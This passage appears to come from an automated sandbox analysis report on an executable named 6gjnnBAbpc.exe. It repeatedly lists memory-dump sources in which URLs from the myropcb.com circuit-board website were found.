00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/?s=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/blog/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/comments/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/suggestion-box/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/download/DownloadApk.php
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/faq/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 